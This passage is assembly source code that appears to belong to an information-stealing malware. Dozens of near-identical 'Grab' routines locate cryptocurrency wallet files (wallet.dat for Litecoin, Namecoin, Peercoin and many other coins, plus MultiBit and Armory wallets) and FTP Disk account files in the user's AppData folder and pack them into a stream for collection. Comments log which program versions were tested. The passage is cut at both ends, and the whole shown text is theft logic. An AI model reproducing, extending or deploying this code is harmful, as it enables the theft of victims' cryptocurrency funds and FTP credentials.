   CMultiBitAppDataDir      db   '\MultiBit',0

.code

GrabMultiBit proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MULTIBIT, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CMultiBitAppDataDir, offset CMultiBitWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMultiBit endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FTP Disk
; Tested: ver 1.2
; SFTP: implemented

IFDEF COMPILE_MODULE_FTPDISK

.data
   CFTPDiskAccountsFile   db   'Accounts.ini',0
   CFTPDiskAppDataDir      db   '\Maxprog\FTP Disk',0

.code

GrabFTPDisk proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FTPDISK, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CFTPDiskAppDataDir, offset CFTPDiskAccountsFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFTPDisk endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Litecoin
; https://litecoin.org/
; Tested: v0.8.5.1-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_LITECOIN

.data
   CLitecoinWalletFile      db   'wallet.dat',0
   CLitecoinAppDataDir      db   '\Litecoin',0

.code

GrabLitecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_LITECOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CLitecoinAppDataDir, offset CLitecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabLitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Namecoin
; http://namecoin.info/
; Tested: 0.3.72
; SFTP: not supported

IFDEF COMPILE_MODULE_LITECOIN

.data
   CNamecoinWalletFile      db   'wallet.dat',0
   CNamecoinAppDataDir      db   '\Namecoin',0

.code

GrabNamecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_NAMECOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CNamecoinAppDataDir, offset CNamecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabNamecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Terracoin
; http://www.terracoin.org/
; Tested: v0.8.0.2
; SFTP: not supported

IFDEF COMPILE_MODULE_TERRACOIN

.data
   CTerracoinWalletFile      db   'wallet.dat',0
   CTerracoinAppDataDir      db   '\Terracoin',0

.code

GrabTerracoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_TERRACOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CTerracoinAppDataDir, offset CTerracoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabTerracoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin Armory
; https://bitcoinarmory.com/
; Tested: Version 0.90-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_BITCOINARMORY

.data
   CBitcoinArmoryWalletFile   db   '.wallet',0
   CBitcoinArmoryAppDataDir   db   '\Armory',0

.code

GrabBitcoinArmory proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BITCOINARMORY, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CBitcoinArmoryAppDataDir, offset CBitcoinArmoryWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBitcoinArmory endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; PPCoin (Peercoin)
; https://ppcoin.com/
; Tested: v.0.3.0ppc-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_PPCOIN

.data
   CPPCoinWalletFile         db   'wallet.dat',0
   CPPCoinAppDataDir         db   '\PPCoin',0

.code

GrabPPCoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PPCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CPPCoinAppDataDir, offset CPPCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPPCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Primecoin
; http://primecoin.org/
; Tested: v0.1.2xpm-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_PRIMECOIN

.data
   CPrimecoinWalletFile      db   'wallet.dat',0
   CPrimecoinAppDataDir      db   '\Primecoin',0

.code

GrabPrimecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PRIMECOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CPrimecoinAppDataDir, offset CPrimecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPrimecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Feathercoin
; http://feathercoin.com/
; Tested: v0.6.4.4
; SFTP: not supported

IFDEF COMPILE_MODULE_PRIMECOIN

.data
   CFeathercoinWalletFile      db   'wallet.dat',0
   CFeathercoinAppDataDir      db   '\Feathercoin',0

.code

GrabFeathercoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FEATHERCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CFeathercoinAppDataDir, offset CFeathercoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFeathercoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; NovaCoin
; http://novaco.in/
; Tested: v0.4.4.0-g32a928e-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_NOVACOIN

.data
   CNovaCoinWalletFile         db   'wallet.dat',0
   CNovaCoinAppDataDir         db   '\NovaCoin',0

.code

GrabNovaCoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_NOVACOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CNovaCoinAppDataDir, offset CNovaCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabNovaCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Freicoin
; http://freico.in/
; Tested: v0.8.3.0-unk-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_FREICOIN

.data
   CFreicoinWalletFile         db   'wallet.dat',0
   CFreicoinAppDataDir         db   '\Freicoin',0

.code

GrabFreicoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FREICOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CFreicoinAppDataDir, offset CFreicoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFreicoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Devcoin
; http://devcoin.org/
; Tested: version 0.3.25.1-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_DEVCOIN

.data
   CDevcoinWalletFile         db   'wallet.dat',0
   CDevcoinAppDataDir         db   '\Devcoin',0

.code

GrabDevcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_DEVCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CDevcoinAppDataDir, offset CDevcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabDevcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Frankocoin
; http://frankos.org/
; Tested: v0.8.4.1-16-g5f1dafe-bet
; SFTP: not supported

IFDEF COMPILE_MODULE_FRANKOCOIN

.data
   CFrankocoinWalletFile         db   'wallet.dat',0
   CFrankocoinAppDataDir         db   '\Franko',0

.code

GrabFrankocoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FRANKOCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CFrankocoinAppDataDir, offset CFrankocoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFrankocoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; ProtoShares
; http://invictus-innovations.com/protoshares
; Tested: v0.8.5.0-unk-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_PROTOSHARES

.data
   CProtoSharesWalletFile         db   'wallet.dat',0
   CProtoSharesAppDataDir         db   '\ProtoShares',0

.code

GrabProtoShares proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PROTOSHARES, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CProtoSharesAppDataDir, offset CProtoSharesWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabProtoShares endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Megacoin
; http://www.megacoin.co.nz
; Tested: v0.8.996.0MEGA-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_MEGACOIN

.data
   CMegacoinWalletFile            db   'wallet.dat',0
   CMegacoinAppDataDir            db   '\Megacoin',0

.code

GrabMegacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MEGACOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CMegacoinAppDataDir, offset CMegacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMegacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Quarkcoin
; http://www.quarkcoin.com/
; Tested: v0.8.3.0-g09e437b-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_QUARKCOIN

.data
   CQuarkcoinWalletFile         db   'wallet.dat',0
   CQuarkcoinAppDataDir         db   '\Quarkcoin',0

.code

GrabQuarkcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_QUARKCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CQuarkcoinAppDataDir, offset CQuarkcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabQuarkcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; WorldCoin
; http://worldcoin.in
; Tested: v0.6.4.4-ga7433e7-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_WORLDCOIN

.data
   CWorldCoinWalletFile         db   'wallet.dat',0
   CWorldCoinAppDataDir         db   '\Worldcoin',0

.code

GrabWorldcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_WORLDCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CWorldCoinAppDataDir, offset CWorldCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabWorldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Infinitecoin
; http://infinitecoin.com/
; Tested: v1.8.0.0
; SFTP: not supported

IFDEF COMPILE_MODULE_WORLDCOIN

.data
   CInfinitecoinWalletFile         db   'wallet.dat',0
   CInfinitecoinAppDataDir         db   '\Infinitecoin',0

.code

GrabInfinitecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_INFINITECOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CInfinitecoinAppDataDir, offset CInfinitecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabInfinitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Ixcoin
; http://ixcoin.org/
; Tested: 0.3.24.30-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_IXCOIN

.data
   CIxcoinWalletFile            db   'wallet.dat',0
   CIxcoinAppDataDir            db   '\Ixcoin',0

.code

GrabIxcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_IXCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CIxcoinAppDataDir, offset CIxcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabIxcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Anoncoin
; https://anoncoin.net
; Tested: v0.7.4b-5-gd36ff9d-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_IXCOIN

.data
   CAnoncoinWalletFile            db   'wallet.dat',0
   CAnoncoinAppDataDir            db   '\Anoncoin',0

.code

GrabAnoncoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ANONCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CAnoncoinAppDataDir, offset CAnoncoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabAnoncoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; BBQcoin
; http://bbqcoin.org/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_BBQCOIN

.data
   CBBQcoinWalletFile            db   'wallet.dat',0
   CBBQcoinAppDataDir            db   '\BBQcoin',0

.code

GrabBBQcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BBQCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CBBQcoinAppDataDir, offset CBBQcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBBQcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Digitalcoin
; http://digitalcoin.co/en/
; Tested: v1.0.0.0-g3aaa7ba-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_DIGITALCOIN

.data
   CDigitalcoinWalletFile            db   'wallet.dat',0
   CDigitalcoinAppDataDir            db   '\Digitalcoin',0

.code

GrabDigitalcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_DIGITALCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CDigitalcoinAppDataDir, offset CDigitalcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabDigitalcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MinCoin
; http://www.min-coin.org/
; Tested: v0.6.5.0-g498f5d1-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_MINCOIN

.data
   CMincoinWalletFile               db   'wallet.dat',0
   CMincoinAppDataDir               db   '\Mincoin',0

.code

GrabMincoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MINCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CMincoinAppDataDir, offset CMincoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; GoldCoin
; http://gldcoin.com/
; Tested: v0.7.1.6-gcf3abdf39d-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_GOLDCOIN

.data
   CGoldcoinWalletFile               db   'wallet.dat',0
   CGoldcoinAppDataDir               db   '\GoldCoin (GLD)',0

.code

GrabGoldcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_GOLDCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CGoldcoinAppDataDir, offset CGoldcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabGoldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; YaCoin
; http://www.yacoin.org/
; Tested: v0.4.0.0-g2nd-yac-wm-alpha
; SFTP: not supported

IFDEF COMPILE_MODULE_YACOIN

.data
   CYacoinWalletFile               db   'wallet.dat',0
   CYacoinAppDataDir               db   '\Yacoin',0

.code

GrabYacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_YACOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CYacoinAppDataDir, offset CYacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabYacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Zetacoin
; http://www.zeta-coin.org/
; Tested: v0.8.99.0-unk-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_ZETACOIN

.data
   CZetacoinWalletFile               db   'wallet.dat',0
   CZetacoinAppDataDir               db   '\Zetacoin',0

.code

GrabZetacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ZETACOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CZetacoinAppDataDir, offset CZetacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabZetacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FastCoin
; http://www.fastcoin.ca/
; Tested: v0.6.3.0-gc4135e8-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_FASTCOIN

.data
   CFastcoinWalletFile               db   'wallet.dat',0
   CFastcoinAppDataDir               db   '\Fastcoin',0

.code

GrabFastcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FASTCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CFastcoinAppDataDir, offset CFastcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFastcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; i0coin
; http://i0coin.bitparking.com/
; Tested: 0.3.25.9-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_I0COIN

.data
   CI0coinWalletFile               db   'wallet.dat',0
   CI0coinAppDataDir               db   '\I0coin',0

.code

GrabI0coin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_I0COIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CI0coinAppDataDir, offset CI0coinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabI0coin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Tagcoin
; http://tagcoin.org/
; Tested: v1.0.2
; SFTP: not supported

IFDEF COMPILE_MODULE_TAGCOIN

.data
   CTagcoinWalletFile               db   'wallet.dat',0
   CTagcoinAppDataDir               db   '\Tagcoin',0

.code

GrabTagcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_TAGCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CTagcoinAppDataDir, offset CTagcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabTagcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bytecoin
; http://www.bytecoin.biz/
; Tested: v0.8.1.1-gfdc7831-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_BYTECOIN

.data
   CBytecoinWalletFile               db   'wallet.dat',0
   CBytecoinAppDataDir               db   '\Bytecoin',0

.code

GrabBytecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BYTECOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CBytecoinAppDataDir, offset CBytecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBytecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Florincoin
; http://www.florincoin.org
; Tested: v0.6.5.8-unk-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_FLORINCOIN

.data
   CFlorincoinWalletFile               db   'wallet.dat',0
   CFlorincoinAppDataDir               db   '\Florincoin',0

.code

GrabFlorincoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FLORINCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CFlorincoinAppDataDir, offset CFlorincoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFlorincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Phoenixcoin
; http://phoenixcoin.org/
; Tested: v0.6.5.0
; SFTP: not supported

IFDEF COMPILE_MODULE_PHOENIXCOIN

.data
   CPhoenixcoinWalletFile               db   'wallet.dat',0
   CPhoenixcoinAppDataDir               db   '\Phoenixcoin',0

.code

GrabPhoenixcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PHOENIXCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CPhoenixcoinAppDataDir, offset CPhoenixcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPhoenixcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Luckycoin
; https://cryptocointalk.com/forum/188-luckycoin-lky/
; Tested: v0.9.9.0
; SFTP: not supported

IFDEF COMPILE_MODULE_LUCKYCOIN

.data
   CLuckycoinWalletFile               db   'wallet.dat',0
   CLuckycoinAppDataDir               db   '\Luckycoin',0

.code

GrabLuckycoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_LUCKYCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CLuckycoinAppDataDir, offset CLuckycoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabLuckycoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; CraftCoin
; http://craftcoin.net
